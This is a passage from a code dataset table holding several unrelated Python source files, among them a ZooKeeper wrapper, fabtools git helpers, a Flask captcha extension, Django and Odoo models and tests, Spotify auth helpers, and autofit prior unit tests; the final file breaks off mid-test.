id
stringlengths 1
7
| text
stringlengths 6
1.03M
| dataset_id
stringclasses 1
value |
---|---|---|
1732048
|
import json
from kazoo.client import KazooClient
from .base import WatchableBase, WatcherBase
class ZooKeeper(WatchableBase):
'''A zookeeper client wrapper. Improves usability especially for watcher callbacks.'''
def __init__(self, *hosts):
self._client = KazooClient(','.join(hosts), read_only=True)
self._started = False
@property
def client(self):
if not self._started:
self._start()
return self._client
def _start(self):
self._client.start()
self._started = True
def get_node(self, name):
data, stat = self.client.get(name)
return json.loads(data) if data != 'false' else {}
def get_children(self, name):
return self.client.get_children(name)
def watch_node(self, name, callback):
return KazooWatcher(self.client.DataWatch(name, func=callback))
def watch_children(self, name, callback):
return KazooWatcher(self.client.ChildrenWatch(name, func=callback))
def watch_all(self, name, callback):
'''callback should accept a single param, children, whcih will be a
list of each child nodes data.
'''
def on_children_change(children):
nodes = {child: self.get_node(node_join(name, child)) for child in children}
callback(nodes)
# This is kind of dumb for now, but basically we want to conform the
# callback signature to a single list of children.
def on_node_change(data, stat):
# TODO: perhaps some sort of cache here? Otherwise we call
# get_node() a lot...
# We don't care about the individual change, just get all configs
# as they are presently.
nodes = {child: self.get_node(node_join(name, child)) for child in self.get_children(name)}
callback(nodes)
# Setup child watcher with our own callback which gets updated node
# values.
watches = [self.watch_children(name, on_children_change)]
# TODO: This might be problematic, because it's going to make new node
# watchers every time the list gets refreshed. Maybe need to keep
# state so we don't create a ton of objects?
for child in self.get_children(name):
watches.append(self.watch_node(node_join(name, child), on_node_change))
return KazooWatcher(*watches)
class KazooWatcher(WatcherBase):
def __init__(self, *watches):
self._watches = watches
def stop(self):
for watch in self._watches:
self._watch._stopped = True
def node_join(*names):
return '/'.join(name.rstrip('/') for name in names)
|
StarcoderdataPython
|
1625881
|
<reponame>return1/fabtools
"""
Git
===
This module provides high-level tools for managing `Git`_ repositories.
.. _Git: http://git-scm.com/
"""
from __future__ import with_statement
from fabric.api import run
from fabtools import git
from fabtools.files import is_dir
def command():
"""
Require the git command-line tool.
Example::
from fabric.api import run
from fabtools import require
require.git.command()
run('git --help')
"""
from fabtools.require.deb import package as require_deb_package
from fabtools.require.rpm import package as require_rpm_package
from fabtools.system import distrib_family
res = run('git --version', quiet=True)
if res.failed:
family = distrib_family()
if family == 'debian':
require_deb_package('git-core')
elif family == 'redhat':
require_rpm_package('git')
else:
raise NotImplementedError()
def working_copy(remote_url, path=None, branch="master", update=True,
use_sudo=False, user=None):
"""
Require a working copy of the repository from the ``remote_url``.
The ``path`` is optional, and defaults to the last segment of the
remote repository URL, without its ``.git`` suffix.
If the ``path`` does not exist, this will clone the remote
repository and check out the specified branch.
If the ``path`` exists and ``update`` is ``True``, it will fetch
changes from the remote repository, check out the specified branch,
then merge the remote changes into the working copy.
If the ``path`` exists and ``update`` is ``False``, it will only
check out the specified branch, without fetching remote changesets.
:param remote_url: URL of the remote repository (e.g.
https://github.com/ronnix/fabtools.git). The given URL
will be the ``origin`` remote of the working copy.
:type remote_url: str
:param path: Absolute or relative path of the working copy on the
filesystem. If this directory doesn't exist yet, a new
working copy is created through ``git clone``. If the
directory does exist *and* ``update == True``, a
``git fetch`` is issued. If ``path is None`` the
``git clone`` is issued in the current working directory and
the directory name of the working copy is created by ``git``.
:type path: str
:param branch: Branch to check out.
:type branch: str
:param update: Whether or not to fetch and merge remote changesets.
:type update: bool
:param use_sudo: If ``True`` execute ``git`` with
:func:`fabric.operations.sudo`, else with
:func:`fabric.operations.run`.
:type use_sudo: bool
:param user: If ``use_sudo is True``, run :func:`fabric.operations.sudo`
with the given user. If ``use_sudo is False`` this parameter
has no effect.
:type user: str
"""
command()
if path is None:
path = remote_url.split('/')[-1].rstrip('.git')
if is_dir(path, use_sudo=use_sudo) and update:
git.fetch(path=path, use_sudo=use_sudo, user=user)
git.checkout(path=path, branch=branch, use_sudo=use_sudo, user=user)
git.pull(path=path, use_sudo=use_sudo, user=user)
elif is_dir(path, use_sudo=use_sudo) and not update:
git.checkout(path=path, branch=branch, use_sudo=use_sudo, user=user)
elif not is_dir(path, use_sudo=use_sudo):
git.clone(remote_url, path=path, use_sudo=use_sudo, user=user)
git.checkout(path=path, branch=branch, use_sudo=use_sudo, user=user)
else:
raise ValueError("Invalid combination of parameters.")
|
StarcoderdataPython
|
1603532
|
"""
The new xCaptcha implementation for Flask without Flask-WTF
"""
__NAME__ = "Flask-xCaptcha"
__version__ = "0.5.2"
__license__ = "MIT"
__author__ = "<NAME>"
__copyright__ = "(c) 2020 <NAME>"
try:
from flask import request
from jinja2 import Markup
import requests
except ImportError as ex:
print("Missing dependencies")
class DEFAULTS(object):
IS_ENABLED = True
THEME = "light"
TYPE = "image"
SIZE = "normal"
TABINDEX = 0
VERIFY_URL = "https://www.google.com/recaptcha/api/siteverify"
API_URL = "//www.google.com/recaptcha/api.js"
DIV_CLASS = "g-recaptcha"
class XCaptcha(object):
def __init__(self,
app=None,
site_key=None,
secret_key=None,
is_enabled=DEFAULTS.IS_ENABLED,
theme=DEFAULTS.THEME,
xtype=DEFAULTS.TYPE,
size=DEFAULTS.SIZE,
tabindex=DEFAULTS.TABINDEX,
verify_url=DEFAULTS.VERIFY_URL,
api_url=DEFAULTS.API_URL,
div_class=DEFAULTS.DIV_CLASS,
**kwargs
):
if app is not None:
self.site_key = app.config.get("XCAPTCHA_SITE_KEY", site_key)
self.secret_key = app.config.get('XCAPTCHA_SECRET_KEY', secret_key)
self.is_enabled = app.config.get("XCAPTCHA_ENABLED", is_enabled)
self.theme = app.config.get("XCAPTCHA_THEME", theme)
self.type = app.config.get("XCAPTCHA_TYPE", xtype)
self.size = app.config.get("XCAPTCHA_SIZE", size)
self.tabindex = app.config.get("XCAPTCHA_TABINDEX", tabindex)
self.verify_url = app.config.get("XCAPTCHA_VERIFY_URL", verify_url)
self.api_url = app.config.get("XCAPTCHA_API_URL", api_url)
self.div_class = app.config.get("XCAPTCHA_DIV_CLASS", div_class)
@app.context_processor
def get_code():
return dict(xcaptcha=Markup(self.get_code()))
elif site_key is not None:
self.site_key = site_key
self.secret_key = secret_key
self.is_enabled = is_enabled
self.theme = theme
self.type = xtype
self.size = size
self.tabindex = tabindex
self.verify_url = verify_url
self.api_url = api_url
self.div_class = div_class
def get_code(self):
"""
Returns the new XCaptcha code
:return:
"""
return "" if not self.is_enabled else ("""
<script src='{API_URL}'></script>
<div class="{DIV_CLASS}" data-sitekey="{SITE_KEY}" data-theme="{THEME}" data-type="{TYPE}" data-size="{SIZE}"\
data-tabindex="{TABINDEX}"></div>
""".format(
DIV_CLASS=self.div_class,
API_URL=self.api_url,
SITE_KEY=self.site_key,
THEME=self.theme,
TYPE=self.type,
SIZE=self.size,
TABINDEX=self.tabindex
)
)
def verify(self, response=None, remote_ip=None):
if self.is_enabled:
data = {
"secret": self.secret_key,
"response": response or request.form.get('{}-response'.format(self.div_class)),
"remoteip": remote_ip or request.environ.get('REMOTE_ADDR')
}
r = requests.get(self.verify_url, params=data)
return r.json()["success"] if r.status_code == 200 else False
return True
|
StarcoderdataPython
|
3330231
|
<reponame>tallninja/python_blockchain<gh_stars>1-10
import time
from backend.blockchain.blockchain import Blockchain
from backend.config import TIME_S
blockchain = Blockchain()
times = []
for i in range(1000):
start_time = time.time_ns() / TIME_S
blockchain.add_block(i)
end_time = time.time_ns() / TIME_S
mine_time = end_time - start_time
times.append(mine_time)
average_time = sum(times) / len(times)
print(f"Block No: {i}")
print(f"last_block_difficulty: {blockchain.chain[-1].difficulty}")
print(f"last_block_nonce: {blockchain.chain[-1].nonce}")
print(f"last_block_hash: {blockchain.chain[-1].hash}")
print(f"Time to mine block: {mine_time} seconds")
print(f"Average_time: {average_time} seconds\n\n")
|
StarcoderdataPython
|
1725451
|
<gh_stars>1-10
from dataclasses import dataclass
from typing import List
from lakey_finicity.models import Customer
# https://community.finicity.com/s/article/201703219-Customers#get_customers
@dataclass
class CustomersListResponse(object):
found: int # Total number of records matching search criteria
displaying: int # Number of records in this responses
moreAvailable: bool # True if this responses does not contain the last record in the result set
customers: List[Customer]
_unused_fields: dict # this is for forward compatibility and should be empty
@staticmethod
def from_dict(data: dict):
data = dict(data) # don't mutate the original
found = data.pop('found')
displaying = data.pop('displaying')
moreAvailable = data.pop('moreAvailable')
customers_raw = data.pop('customers')
customers = [Customer.from_dict(d) for d in customers_raw]
return CustomersListResponse(
found=found,
displaying=displaying,
moreAvailable=moreAvailable,
customers=customers,
_unused_fields=data,
)
|
StarcoderdataPython
|
3286777
|
from django.db import models
from django.contrib.auth.models import User
from django.db.models.signals import post_save
from django.dispatch import receiver
from django.core.exceptions import ObjectDoesNotExist
class Interest(models.Model):
interest = models.CharField(max_length=150)
def __str__(self):
return self.interest
class Profile(models.Model):
"""Extension of User model with one-to-one link."""
user = models.OneToOneField(User, related_name='profile', on_delete=models.CASCADE)
line = models.CharField(max_length=150)
bio = models.TextField(max_length=300)
age = models.PositiveIntegerField(default=18)
contactInfo = models.CharField(max_length=200)
profilePhotoLink = models.URLField(max_length=200, blank=True)
interests = models.ManyToManyField(Interest, related_name='profile')
@receiver(post_save, sender=User)
def create_save_user_profile(sender, instance, created, **kwargs):
try:
instance.profile.save()
except ObjectDoesNotExist:
Profile.objects.create(user=instance)
def __str__(self):
return self.user.username
class Request(models.Model):
"""A conversation request that one user sends to another."""
sender = models.ForeignKey(User, related_name='request_sender', on_delete=models.CASCADE)
receiver = models.ForeignKey(User, related_name='request_receiver', on_delete=models.CASCADE)
PENDING = 0
PASSED = 1
STATUS_CHOICES = (
(PENDING, "pending"),
(PASSED, "passed"),
)
status = models.PositiveSmallIntegerField(choices=STATUS_CHOICES)
def __str__(self):
return "request from " + self.sender.first_name + " to " + self.receiver.first_name
class Match(models.Model):
"""A conversation match between two users who want to talk to each other."""
userA = models.ForeignKey(User, related_name='match_user_A', on_delete=models.CASCADE, null=True)
friendA = models.ForeignKey(User, related_name='match_friend_A', on_delete=models.CASCADE, null=True)
userB = models.ForeignKey(User, related_name='match_user_B', on_delete=models.CASCADE, null=True)
friendB = models.ForeignKey(User, related_name='match_friend_B', on_delete=models.CASCADE, null=True)
def __str__(self):
return "match between " + self.userA.first_name + " and " + self.friendA.first_name
|
StarcoderdataPython
|
1763338
|
<filename>src/spotify_party/auth.py
__all__ = ["require_auth", "handle_auth", "update_auth", "call_api"]
import time
from functools import partial, wraps
from typing import TYPE_CHECKING, Any, Awaitable, Callable, Optional, Tuple
import aiohttp_session
from aiohttp import web
from aiohttp_spotify import SpotifyAuth, SpotifyResponse
if TYPE_CHECKING:
from .data_model import User # NOQA
def require_auth(
original_handler: Optional[
Callable[[web.Request, "User"], Awaitable]
] = None,
*,
redirect: bool = True,
admin: bool = False,
) -> Callable[..., Any]:
"""A decorator requiring that the user is authenticated to see a view
Args:
redirect (bool, optional): If true, the user will be redirected to the
login page. Otherwise, a :class:`HTTPUnauthorized error is thrown.
"""
if original_handler is None:
return partial(_require_auth, redirect=redirect, admin=admin)
return _require_auth(original_handler, redirect=redirect, admin=admin)
def _require_auth(
handler: Callable[[web.Request, "User"], Awaitable],
*,
redirect: bool = True,
admin: bool = False,
) -> Callable[[web.Request], Awaitable]:
"""This does the heavy lifting for the authorization check"""
@wraps(handler)
async def wrapped(request: web.Request) -> web.Response:
session = await aiohttp_session.get_session(request)
user_id = session.get("sp_user_id")
user = await request.config_dict["db"].get_user(user_id)
if user is None:
if admin:
return web.HTTPNotFound()
if not redirect:
raise web.HTTPUnauthorized()
raise web.HTTPTemporaryRedirect(
location=request.config_dict["spotify_app"]
.router["auth"]
.url_for()
.with_query(redirect=request.url.path)
)
if admin and user.user_id not in request.app["config"]["admins"]:
return web.HTTPNotFound()
async with user:
await user.update_auth(request)
return await handler(request, user)
return wrapped
async def handle_auth(request: web.Request, auth: SpotifyAuth) -> None:
"""This will be called at the end of the initial OAuth dance"""
response = await request.app["spotify_client"].request(
request.config_dict["client_session"], auth, "/me"
)
if response.status != 200:
raise web.HTTPInternalServerError()
user_info = response.json()
if user_info.get("product", "free") != "premium":
raise web.HTTPTemporaryRedirect(
location=request.app["main_app"].router["premium"].url_for()
)
user = await request.config_dict["db"].add_user(
user_info["id"], user_info["display_name"], response.auth
)
session = await aiohttp_session.get_session(request)
session["sp_user_id"] = user.user_id
async def update_auth(
request: web.Request, auth: SpotifyAuth
) -> Tuple[bool, SpotifyAuth]:
auth_changed = False
if auth.expires_at - time.time() <= 600: # 10 minutes
auth_changed = True
auth = await request.config_dict["spotify_app"][
"spotify_client"
].update_auth(request.config_dict["client_session"], auth)
return auth_changed, auth
async def call_api(
request: web.Request,
user: Optional["User"],
endpoint: str,
*,
method: str = "GET",
**kwargs,
) -> Optional[SpotifyResponse]:
"""Call the Spotify API
Args:
request (web.Request): The current request
user (Optional[User]): The current user (this call will fail
without one)
endpoint (str): The API path
method (str, optional): The HTTP request method. Defaults to "GET".
Returns:
Optional[SpotifyResponse]: The response from the API
"""
if user is None:
return None
response = await request.config_dict["spotify_app"][
"spotify_client"
].request(
request.config_dict["client_session"],
user.auth,
endpoint,
method=method,
**kwargs,
)
# Update the authentication info if required
if response.auth_changed:
user.auth = response.auth
return response
|
StarcoderdataPython
|
29574
|
import unittest
import io
from unittest import mock
from tests.lib.utils import INSPECT
from custom_image_cli.validation_tool import validation_helper
from custom_image_cli.validation_tool.validation_models.validation_models import \
ImageDetail, ImageManifest, EmrRelease
class TestValidationHelper(unittest.TestCase):
def setUp(self) -> None:
self.inspect = INSPECT
self.manifest = ImageManifest([EmrRelease("release_name", [ImageDetail("image_type", None, [], [])])], [], [])
@mock.patch('sys.stdout', new_callable=io.StringIO)
@mock.patch('custom_image_cli.validation_tool.validation_helper.load_validation_info')
@mock.patch("custom_image_cli.validation_tool.validation_tests.check_local_job_run.CheckLocalJobRun.check")
@mock.patch("custom_image_cli.validation_tool.validation_tests.check_manifest.CheckManifest.check")
@mock.patch("custom_image_cli.validation_tool.validation_tests.check_manifest.CheckManifest.__init__")
@mock.patch("custom_image_cli.validation_tool.validation_tests.check_files.CheckFiles.check")
@mock.patch("custom_image_cli.validation_tool.validation_tests.check_files.CheckFiles.__init__")
@mock.patch("custom_image_cli.validation_tool.validation_tests.check_envs.CheckEnvs.check")
@mock.patch("custom_image_cli.validation_tool.validation_tests.check_envs.CheckEnvs.__init__")
def test_validate_all(self, check_envs_constructor, check_envs, check_files_constructor,
check_files, check_manifest_constructor,
check_manifest, check_local_job_run, load_info, mock_stdout):
check_envs_constructor.return_value = None
check_envs.return_value = True
check_files_constructor.return_value = None
check_files.return_value = True
check_manifest_constructor.return_value = None
check_manifest.return_value = True
check_local_job_run.return_value = True
load_info.return_value = ImageDetail("image_type", None, [], []), [], []
actual = validation_helper.validate_all(self.inspect, "docker_cmd", "docker_image_uri",
self.manifest, "release_name", "image_type", "log")
self.assertEqual(actual, True)
check_manifest.assert_called_once()
check_envs.assert_called_once()
check_files.assert_called_once()
check_local_job_run.assert_called_once()
expected = "... Checking Image Manifest\n"
self.assertEqual(expected, mock_stdout.getvalue())
@mock.patch("custom_image_cli.validation_tool.check_inputs.check_version")
@mock.patch("custom_image_cli.validation_tool.check_inputs.check_image")
def test_load_validation_info(self, check_image, check_version):
value = self.manifest
check_version.return_value = None
check_image.return_value = None
actual_img, actual_file, actual_env = validation_helper.load_validation_info(self.manifest, "release_name", "image_type", "log")
self.assertEqual(actual_img, self.manifest.emr_releases[0].images[0])
self.assertEqual(actual_file, [])
self.assertEqual(actual_env, [])
check_version.assert_called_once_with(self.manifest.emr_releases[0], "release_name", "log")
check_image.assert_called_once_with(self.manifest.emr_releases[0].images[0], "image_type", "log")
|
StarcoderdataPython
|
3251090
|
# -*- coding: utf-8 -*-
import datetime
from dateutil.relativedelta import relativedelta
from unittest.mock import patch
import time
from odoo.addons.membership.tests.common import TestMembershipCommon
from odoo.tests import tagged
from odoo import fields
@tagged('post_install', '-at_install')
class TestMembership(TestMembershipCommon):
def test_none_membership(self):
self.membership_1.write({
'membership_date_from': datetime.date.today() + relativedelta(years=-2),
'membership_date_to': datetime.date.today() + relativedelta(years=-1),
})
self.partner_1.create_membership_invoice(self.membership_1, 75.0)
self.assertEqual(
self.partner_1.membership_state, 'none',
'membership: outdated non paid subscription should keep in non-member state')
def test_old_membership(self):
self.membership_1.write({
'membership_date_from': datetime.date.today() + relativedelta(years=-2),
'membership_date_to': datetime.date.today() + relativedelta(years=-1),
})
self.partner_1.create_membership_invoice(self.membership_1, 75.0)
self.assertEqual(
self.partner_1.membership_state, 'none',
'membership: outdated non paid subscription should keep in non-member state')
# subscribes to a membership
self.partner_1.create_membership_invoice(self.membership_1, 75.0)
# checks for invoices
invoice = self.env['account.move'].search([('partner_id', '=', self.partner_1.id)], limit=1)
self.assertEqual(
invoice.state, 'draft',
'membership: new subscription should create a draft invoice')
self.assertEqual(
invoice.invoice_line_ids[0].product_id, self.membership_1,
'membership: new subscription should create a line with the membership as product')
self.assertEqual(
invoice.invoice_line_ids[0].price_unit, 75.0,
'membership: new subscription should create a line with the given price instead of product price')
self.assertEqual(
self.partner_1.membership_state, 'none',
'membership: old membership unpaid should be in non-member state')
# the invoice is open -> customer goes to invoiced status
invoice.action_post()
self.assertEqual(
self.partner_1.membership_state, 'none',
'membership: after opening the invoice for old membership, it should remain in non paid status')
# payment process
payment = self.env['account.payment'].create({
'payment_date': time.strftime('%Y-%m-%d'),
'journal_id': self.env['account.journal'].search([], limit=1).id,
'payment_method_id': self.env['account.payment.method'].search([], limit=1).id,
'payment_type': 'inbound',
'partner_type': 'customer',
'partner_id': invoice.partner_id.id,
'amount': 500,
'company_id': self.env.company.id,
'currency_id': self.env.company.currency_id.id,
})
payment.post()
inv1_receivable = invoice.line_ids.filtered(lambda l: l.account_id.internal_type == 'receivable')
pay_receivable = payment.move_line_ids.filtered(lambda l: l.account_id.internal_type == 'receivable')
(inv1_receivable + pay_receivable).reconcile()
# the invoice is paid -> customer goes to paid status
self.assertEqual(
self.partner_1.membership_state, 'old',
'membership: after paying the invoice, customer should be in old status')
# check second partner then associate them
self.assertEqual(
self.partner_2.membership_state, 'free',
'membership: free member customer should be in free state')
self.partner_2.write({'free_member': False, 'associate_member': self.partner_1.id})
self.assertEqual(
self.partner_2.membership_state, 'old',
'membership: associated customer should be in old state')
def test_paid_membership(self):
self.assertEqual(
self.partner_1.membership_state, 'none',
'membership: default membership status of partners should be None')
# subscribes to a membership
invoice = self.partner_1.create_membership_invoice(self.membership_1, 75.0)
self.assertEqual(
invoice.state, 'draft',
'membership: new subscription should create a draft invoice')
self.assertEqual(
invoice.invoice_line_ids[0].product_id, self.membership_1,
'membership: new subscription should create a line with the membership as product')
self.assertEqual(
invoice.invoice_line_ids[0].price_unit, 75.0,
'membership: new subscription should create a line with the given price instead of product price')
self.assertEqual(
self.partner_1.membership_state, 'waiting',
'membership: new membership should be in waiting state')
# the invoice is open -> customer goes to invoiced status
invoice.post()
self.assertEqual(
self.partner_1.membership_state, 'invoiced',
'membership: after opening the invoice, customer should be in invoiced status')
# the invoice is paid -> customer goes to paid status
bank_journal = self.env['account.journal'].create({'name': 'Bank', 'type': 'bank', 'code': 'BNK67'})
self.env['account.payment'].create({
'payment_method_id': self.env.ref("account.account_payment_method_manual_in").id,
'payment_type': 'inbound',
'invoice_ids': [(6, False, invoice.ids)],
'amount': 86.25,
'journal_id': bank_journal.id,
'partner_type': 'customer',
}).post()
self.assertEqual(
self.partner_1.membership_state, 'paid',
'membership: after paying the invoice, customer should be in paid status')
# check second partner then associate them
self.assertEqual(
self.partner_2.membership_state, 'free',
'membership: free member customer should be in free state')
self.partner_2.write({'free_member': False, 'associate_member': self.partner_1.id})
self.assertEqual(
self.partner_2.membership_state, 'paid',
'membership: associated customer should be in paid state')
def test_cancel_membership(self):
self.assertEqual(
self.partner_1.membership_state, 'none',
'membership: default membership status of partners should be None')
# subscribes to a membership
invoice = self.partner_1.create_membership_invoice(self.membership_1, 75.0)
def patched_today(*args, **kwargs):
return fields.Date.to_date('2019-01-01')
with patch.object(fields.Date, 'today', patched_today):
invoice.button_cancel()
self.partner_1._compute_membership_state()
self.assertEqual(invoice.state, 'cancel')
self.assertEqual(self.partner_1.membership_state, 'canceled')
|
StarcoderdataPython
|
3235706
|
<gh_stars>0
import math
import pytest
import autofit as af
from autofit import exc
class TestPriorLimits:
def test_out_of_order_prior_limits(self):
with pytest.raises(af.exc.PriorException):
af.UniformPrior(1.0, 0)
with pytest.raises(af.exc.PriorException):
af.GaussianPrior(0, 1, 1, 0)
def test_in_or_out(self):
prior = af.GaussianPrior(0, 1, 0, 1)
with pytest.raises(af.exc.PriorLimitException):
prior.assert_within_limits(-1)
with pytest.raises(af.exc.PriorLimitException):
prior.assert_within_limits(1.1)
prior.assert_within_limits(0.0)
prior.assert_within_limits(0.5)
prior.assert_within_limits(1.0)
def test_no_limits(self):
prior = af.GaussianPrior(0, 1)
prior.assert_within_limits(100)
prior.assert_within_limits(-100)
prior.assert_within_limits(0)
prior.assert_within_limits(0.5)
def test_uniform_prior(self):
prior = af.UniformPrior(0, 1)
with pytest.raises(af.exc.PriorLimitException):
prior.assert_within_limits(-1)
with pytest.raises(af.exc.PriorLimitException):
prior.assert_within_limits(1.1)
prior.assert_within_limits(0.0)
prior.assert_within_limits(0.5)
prior.assert_within_limits(1.0)
def test_prior_creation(self):
mapper = af.ModelMapper()
mapper.component = af.m.MockClassx2
prior_tuples = mapper.prior_tuples_ordered_by_id
assert prior_tuples[0].prior.lower_limit == 0
assert prior_tuples[0].prior.upper_limit == 1
assert prior_tuples[1].prior.lower_limit == 0
assert prior_tuples[1].prior.upper_limit == 2
def test_out_of_limits(self):
mm = af.ModelMapper()
mm.mock_class_gaussian = af.m.MockClassx2
assert mm.instance_from_vector([1, 2]) is not None
with pytest.raises(af.exc.PriorLimitException):
mm.instance_from_vector(([1, 3]))
with pytest.raises(af.exc.PriorLimitException):
mm.instance_from_vector(([-1, 2]))
def test_inf(self):
mm = af.ModelMapper()
mm.mock_class_inf = af.m.MockClassInf
prior_tuples = mm.prior_tuples_ordered_by_id
assert prior_tuples[0].prior.lower_limit == float("-inf")
assert prior_tuples[0].prior.upper_limit == 0
assert prior_tuples[1].prior.lower_limit == 0
assert prior_tuples[1].prior.upper_limit == float("inf")
assert mm.instance_from_vector([-10000, 10000]) is not None
with pytest.raises(af.exc.PriorLimitException):
mm.instance_from_vector(([1, 0]))
with pytest.raises(af.exc.PriorLimitException):
mm.instance_from_vector(([0, -1]))
def test_preserve_limits_tuples(self):
mm = af.ModelMapper()
mm.mock_class_gaussian = af.m.MockClassx2
new_mapper = mm.mapper_from_gaussian_tuples(
tuples=[(0.0, 0.5), (0.0, 1)], use_widths=True, use_errors=True
)
prior_tuples = new_mapper.prior_tuples_ordered_by_id
assert prior_tuples[0].prior.lower_limit == 0
assert prior_tuples[0].prior.upper_limit == 1
assert prior_tuples[1].prior.lower_limit == 0
assert prior_tuples[1].prior.upper_limit == 2
def test__only_use_passed_errors_to_set_up_gaussian_prior(self):
mm = af.ModelMapper()
mm.mock_class_gaussian = af.m.MockClassx2
new_mapper = mm.mapper_from_gaussian_tuples(
tuples=[(0.1, 0.2), (0.3, 0.4)], use_widths=False, use_errors=True
)
prior_tuples = new_mapper.prior_tuples_ordered_by_id
assert prior_tuples[0].prior.mean == 0.1
assert prior_tuples[0].prior.sigma == 0.2
assert prior_tuples[1].prior.mean == 0.3
assert prior_tuples[1].prior.sigma == 0.4
def test__only_use_widths_to_pass_priors(self):
mm = af.ModelMapper()
mm.mock_class_gaussian = af.m.MockClassx2
new_mapper = mm.mapper_from_gaussian_tuples(
tuples=[(5.0, 5.0), (5.0, 5.0)], use_widths=True, use_errors=False
)
prior_tuples = new_mapper.prior_tuples_ordered_by_id
assert prior_tuples[0].prior.mean == 5.0
assert prior_tuples[0].prior.sigma == 1.0
assert prior_tuples[1].prior.mean == 5.0
assert prior_tuples[1].prior.sigma == 2.0
def test__use_max_of_widths_and_passed_errors_to_pass_priors(self):
mm = af.ModelMapper()
mm.mock_class_gaussian = af.m.MockClassx2
new_mapper = mm.mapper_from_gaussian_tuples(
tuples=[(5.0, 0.2), (5.0, 5.0)], use_widths=True, use_errors=True
)
prior_tuples = new_mapper.prior_tuples_ordered_by_id
assert prior_tuples[0].prior.mean == 5.0
assert prior_tuples[0].prior.sigma == 1.0
assert prior_tuples[1].prior.mean == 5.0
assert prior_tuples[1].prior.sigma == 5.0
def test_from_gaussian_no_limits(self):
mm = af.ModelMapper()
mm.mock_class_gaussian = af.m.MockClassx2
new_mapper = mm.mapper_from_gaussian_tuples(
[(0.0, 0.5), (0.0, 1)], no_limits=True
)
priors = new_mapper.priors
assert priors[0].lower_limit == float("-inf")
assert priors[0].upper_limit == float("inf")
assert priors[1].lower_limit == float("-inf")
assert priors[1].upper_limit == float("inf")
class TestPriorMean:
def test_simple(self):
uniform_prior = af.UniformPrior(0.0, 1.0)
assert uniform_prior.mean == 0.5
def test_higher(self):
uniform_prior = af.UniformPrior(1.0, 2.0)
assert uniform_prior.mean == 1.5
class TestAddition:
def test_abstract_plus_abstract(self):
one = af.AbstractModel()
two = af.AbstractModel()
one.a = "a"
two.b = "b"
three = one + two
assert three.a == "a"
assert three.b == "b"
def test_list_properties(self):
one = af.AbstractModel()
two = af.AbstractModel()
one.a = ["a"]
two.a = ["b"]
three = one + two
assert three.a == ["a", "b"]
def test_instance_plus_instance(self):
one = af.ModelInstance()
two = af.ModelInstance()
one.a = "a"
two.b = "b"
three = one + two
assert three.a == "a"
assert three.b == "b"
def test_mapper_plus_mapper(self):
one = af.ModelMapper()
two = af.ModelMapper()
one.a = af.PriorModel(af.m.MockClassx2)
two.b = af.PriorModel(af.m.MockClassx2)
three = one + two
assert three.prior_count == 4
class TestUniformPrior:
def test__simple_assumptions(self):
uniform_simple = af.UniformPrior(lower_limit=0.0, upper_limit=1.0)
assert uniform_simple.value_for(0.0) == 0.0
assert uniform_simple.value_for(1.0) == 1.0
assert uniform_simple.value_for(0.5) == 0.5
def test__non_zero_lower_limit(self):
uniform_half = af.UniformPrior(lower_limit=0.5, upper_limit=1.0)
assert uniform_half.value_for(0.0) == 0.5
assert uniform_half.value_for(1.0) == 1.0
assert uniform_half.value_for(0.5) == 0.75
def test_width(self):
assert af.UniformPrior(2, 5).width == 3
def test_negative_range(self):
prior = af.UniformPrior(-1, 0)
assert prior.width == 1
assert prior.value_for(0.0) == -1
assert prior.value_for(1.0) == 0.0
def test__log_prior_from_value(self):
gaussian_simple = af.UniformPrior(lower_limit=-40, upper_limit=70)
log_prior = gaussian_simple.log_prior_from_value(value=0.0)
assert log_prior == 0.0
log_prior = gaussian_simple.log_prior_from_value(value=11.0)
assert log_prior == 0.0
class TestLogUniformPrior:
def test__simple_assumptions(self):
log_uniform_simple = af.LogUniformPrior(lower_limit=1.0e-8, upper_limit=1.0)
assert log_uniform_simple.value_for(0.0) == 1.0e-8
assert log_uniform_simple.value_for(1.0) == 1.0
assert log_uniform_simple.value_for(0.5) == pytest.approx(0.0001, abs=0.000001)
def test__non_zero_lower_limit(self):
log_uniform_half = af.LogUniformPrior(lower_limit=0.5, upper_limit=1.0)
assert log_uniform_half.value_for(0.0) == 0.5
assert log_uniform_half.value_for(1.0) == 1.0
assert log_uniform_half.value_for(0.5) == pytest.approx(0.70710678118, 1.0e-4)
def test__log_prior_from_value(self):
gaussian_simple = af.LogUniformPrior(lower_limit=1e-8, upper_limit=1.0)
log_prior = gaussian_simple.log_prior_from_value(value=1.0)
assert log_prior == 1.0
log_prior = gaussian_simple.log_prior_from_value(value=2.0)
assert log_prior == 0.5
log_prior = gaussian_simple.log_prior_from_value(value=4.0)
assert log_prior == 0.25
gaussian_simple = af.LogUniformPrior(lower_limit=50.0, upper_limit=100.0)
log_prior = gaussian_simple.log_prior_from_value(value=1.0)
assert log_prior == 1.0
log_prior = gaussian_simple.log_prior_from_value(value=2.0)
assert log_prior == 0.5
log_prior = gaussian_simple.log_prior_from_value(value=4.0)
assert log_prior == 0.25
def test__lower_limit_zero_or_below_raises_error(self):
with pytest.raises(exc.PriorException):
af.LogUniformPrior(lower_limit=-1.0, upper_limit=1.0)
with pytest.raises(exc.PriorException):
af.LogUniformPrior(lower_limit=0.0, upper_limit=1.0)
class TestGaussianPrior:
def test__simple_assumptions(self):
gaussian_simple = af.GaussianPrior(mean=0.0, sigma=1.0)
assert gaussian_simple.value_for(0.1) == pytest.approx(-1.281551, 1.0e-4)
assert gaussian_simple.value_for(0.9) == pytest.approx(1.281551, 1.0e-4)
assert gaussian_simple.value_for(0.5) == 0.0
def test__non_zero_mean(self):
gaussian_half = af.GaussianPrior(mean=0.5, sigma=2.0)
assert gaussian_half.value_for(0.1) == pytest.approx(-2.0631031, 1.0e-4)
assert gaussian_half.value_for(0.9) == pytest.approx(3.0631031, 1.0e-4)
assert gaussian_half.value_for(0.5) == 0.5
def test__log_prior_from_value(self):
gaussian_simple = af.GaussianPrior(mean=0.0, sigma=1.0)
log_prior = gaussian_simple.log_prior_from_value(value=0.0)
assert log_prior == 0.0
log_prior = gaussian_simple.log_prior_from_value(value=1.0)
assert log_prior == 0.5
log_prior = gaussian_simple.log_prior_from_value(value=2.0)
assert log_prior == 2.0
gaussian_simple = af.GaussianPrior(mean=1.0, sigma=2.0)
log_prior = gaussian_simple.log_prior_from_value(value=0.0)
assert log_prior == 0.125
log_prior = gaussian_simple.log_prior_from_value(value=1.0)
assert log_prior == 0.0
log_prior = gaussian_simple.log_prior_from_value(value=2.0)
assert log_prior == 0.125
gaussian_simple = af.GaussianPrior(mean=30.0, sigma=60.0)
log_prior = gaussian_simple.log_prior_from_value(value=2.0)
